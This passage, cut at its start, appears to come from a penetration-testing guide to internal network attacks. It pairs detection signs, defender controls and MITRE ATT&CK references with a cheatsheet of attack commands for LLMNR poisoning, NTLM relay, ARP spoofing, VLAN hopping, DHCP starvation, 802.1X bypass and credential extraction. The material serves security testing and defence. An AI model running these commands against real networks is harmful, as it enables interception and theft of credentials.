802.1X BypassMAC flapping, multiple MACs on authenticated portPort security violations, 802.1X re-auth failures
IPv6 SLAAC/DHCPv6Unexpected RAs, DHCPv6 from unknown sourceRA Guard violations, NDPMon alerts
Passive SniffingPromiscuous NIC modePromiscuous detection scripts, switch SPAN alerts

Defender controls you will encounter:

  • Dynamic ARP Inspection (DAI) -- validates ARP against DHCP snooping table; blocks ARP spoofing.
  • DHCP Snooping -- restricts DHCP to trusted ports; prevents rogue DHCP and starvation.
  • Port Security -- limits MACs per port; blocks starvation and MAB spoofing.
  • RA Guard -- filters unauthorized Router Advertisements; blocks mitm6/SLAAC.
  • SMB Signing / LDAP Signing+Channel Binding -- blocks NTLM relay.
  • Native VLAN hardening (unused VLAN as native) -- defeats double tagging.
  • Private VLANs -- prevents same-VLAN host-to-host traffic; limits ARP spoof scope.
  • NDR (Darktrace, Vectra, ExtraHop) -- detects anomalous lateral traffic.

Engagement Cheatsheet

SCENARIO                              TECHNIQUE                    TOOL / COMMAND
------------------------------------  ---------------------------  ------------------------------------------------
Harvest creds passively               LLMNR/NBT-NS poisoning      responder -I eth0 -wrf
Creds captured, won't crack           NTLM relay                  ntlmrelayx -tf targets.txt -smb2support
MITM a specific host                  ARP spoof + sniff           bettercap: arp.spoof on + net.sniff on
Intercept HTTPS traffic               SSL strip + HSTS bypass     sslstrip+ / dns2proxy / bettercap http.proxy
Reach another VLAN                    DTP trunk negotiation       yersinia dtp -attack 1
Reach VLAN (DTP disabled)             Double tagging              scapy: Dot1Q(vlan=1)/Dot1Q(vlan=target)
Exhaust DHCP, become gateway          Starvation + rogue DHCP     dhcpstarv + dnsmasq rogue config
Bypass 802.1X (MAB fallback)          MAC spoofing                macchanger -m <auth_mac> eth0
Bypass 802.1X (physical)              Bridge insertion             ip link add br0 type bridge
IPv6 DNS takeover + relay             SLAAC/DHCPv6 poisoning      mitm6 -d domain + ntlmrelayx -6
Passive recon only                    Traffic sniffing             tcpdump -i eth0 -w capture.pcap
Extract creds from capture            Credential extraction        PCredz -f capture.pcap / net-creds
Disrupt STP topology                  STP root bridge attack       yersinia stp -attack 4
Poison from Windows foothold          Windows-native poisoning     Inveigh -LLMNR Y -NBNS Y

MITRE ATT&CK references:

  • T1557 -- Adversary-in-the-Middle
  • T1557.001 -- LLMNR/NBT-NS Poisoning and SMB Relay
  • T1557.002 -- ARP Cache Poisoning
  • T1557.003 -- DHCP Spoofing
  • T1040 -- Network Sniffing
  • T1599 -- Network Boundary Bridging

Key References

发现问题?提交给管理员复核

评分:

评论 (0)

暂无评论,成为第一个评论者吧!